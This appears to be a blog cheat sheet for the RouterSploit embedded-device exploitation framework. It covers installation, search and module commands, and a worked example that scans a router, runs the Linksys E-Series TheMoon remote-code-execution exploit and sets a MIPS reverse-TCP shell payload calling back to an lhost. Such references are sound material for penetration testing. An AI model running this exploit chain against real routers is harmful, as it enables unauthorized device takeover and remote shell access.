RouterSploit

The RouterSploit Framework is an open-source exploitation framework written in Python and dedicated to embedded devices.

It consists of various modules that aid penetration testing operations:

  • exploits – modules that take advantage of identified vulnerabilities
  • creds – modules designed to test credentials against network services
  • scanners – modules that check if a target is vulnerable to any exploit
  • payloads – modules that are responsible for generating payloads for various architectures and injection points
  • generic – modules that perform generic attacks

Commands RouterSploit:

RouterSploit Installation
# https://github.com/threat9/routersploit

# On Kali: 
    apt update && apt install routersploit


# On Kali and any other Linux distribution:
    apt-get install python3-pip
    git clone https://www.github.com/threat9/routersploit
    cd routersploit   # move into routersploit directory
    python3 -m pip install -r requirements.txt


# To update RouterSploit run `git pull` in the RouterSploit directory.

# To start RouterSploit run `python3 rsf.py` in the RouterSploit directory.


RouterSploit CLI:
# Use <tab> key multiple times for completion.

# shows all modules
        rsf> show all  

# searches
        rsf> search cisco
        rsf> search type=exploits
        rsf> search device=cameras

# selecting a module
        rsf> use module_name

# displaying the options of a selected module
        rsf> show options

# setting an option of a module
        rsf> set option_name

# launching a module
        csf> run

        Example:
        rsf > use scanners/autopwn
        rsf (AutoPwn) > 
        rsf (AutoPwn) > set target 192.168.0.1
        [+] target => 192.168.0.1
        rsf (AutoPwn) > show options
        rsf (AutoPwn) > run

# if the target is vulnerable, execute the exploit
        rsf (AutoPwn) > use exploits/routers/linksys/eseries_themoon_rce
        rsf (Linksys E-Series TheMoon RCE) > show options
        rsf (Linksys E-Series TheMoon RCE) > set target 192.168.0.1
        rsf (Linksys E-Series TheMoon RCE) > run
        cmd> show payloads
        cmd > set payload mipsle/reverse_tcp
        cmd (MIPSLE Reverse TCP) > set lhost 192.168.0.30
        lhost => 192.168.0.30
        cmd (MIPSLE Reverse TCP) > run

Leave a Reply

Your email address will not be published. Required fields are marked *

Proudly powered by WordPress | Theme: Code Blog by Crimson Themes.